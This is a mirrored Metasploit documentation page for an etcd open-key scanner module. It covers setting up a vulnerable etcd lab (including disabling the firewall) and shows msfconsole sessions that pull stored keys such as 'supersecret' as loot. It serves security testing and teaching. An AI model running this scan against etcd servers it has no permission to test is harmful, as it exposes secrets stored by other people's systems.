CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md
Views: 1904

Vulnerable Application

etcd is a distributed reliable key-value store, which when used in an open and default configuration gives unauthenticated users access to the data stored via HTTP API.

Centos 7.1

  1. yum install etcd

  2. vi /etc/etcd/etcd.conf replace (and uncomment) items with localhost for your IP.

  3. systemctl start etcd; systemctl enable etcd

  4. On Centos 7.1 you need to mod (or disable) the firewall: systemctl stop firewalld

  5. Lastly, lets add a key-value for interest: curl http://[IP]:2379/v2/keys/supersecret -XPUT -d value="password!"

Docker

  1. docker run -p 2379:2379 miguelgrinberg/easy-etcd

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use auxiliary/scanner/etcd/open_key_scanner

  4. Do: set rhosts [IPs]

  5. Do: run

  6. You should get a JSON response, and the data saved to loot.

Scenarios

etcd 3.2.15 on CentOS 7.1

msf5 > use auxiliary/scanner/etcd/open_key_scanner
msf5 auxiliary(scanner/etcd/open_key_scanner) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/etcd/open_key_scanner) > run

[+] 2.2.2.2:2379
Version: {"etcdserver":"3.2.15","etcdcluster":"3.2.0"}
Data: {
  "action": "get",
  "node": {
    "dir": true,
    "nodes": [
      {
        "key": "/supersecret",
        "value": "password",
        "modifiedIndex": 6,
        "createdIndex": 6
      }
    ]
  }
}

Loot
====

host           service  type       name       content     info       path
----           -------  ----       ----       -------     ----       ----
2.2.2.2                 etcd.data  etcd.keys  text/plain  etcd keys  /root/.msf4/loot/20180325144351_default_2.2.2.2_etcd.data_425280.txt

msf5 auxiliary(scanner/etcd/open_key_scanner) > services
Services
========

host           port  proto  name  state  info
----           ----  -----  ----  -----  ----
2.2.2.2        2379  tcp    etcd  open   {"etcdserver":"3.2.15","etcdcluster":"3.2.0"}

etcd in Docker

msf5 > use auxiliary/scanner/etcd/open_key_scanner
msf5 auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 auxiliary(scanner/etcd/open_key_scanner) > run

[+] 127.0.0.1:2379
Version: {"etcdserver":"3.1.3","etcdcluster":"3.1.0"}
Data: {
  "action": "get",
  "node": {
    "dir": true
  }
}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/etcd/open_key_scanner) > loot

Loot
====

host       service  type       name       content    info       path
----       -------  ----       ----       -------    ----       ----
127.0.0.1           etcd.data  etcd.keys  text/json  etcd keys  /root/.msf4/loot/20180328092245_default_127.0.0.1_etcd.data_260058.txt

msf5 auxiliary(scanner/etcd/open_key_scanner) > services
Services
========

host       port  proto  name  state  info
----       ----  -----  ----  -----  ----
127.0.0.1  2379  tcp    etcd  open   {"etcdserver":"3.1.3","etcdcluster":"3.1.0"}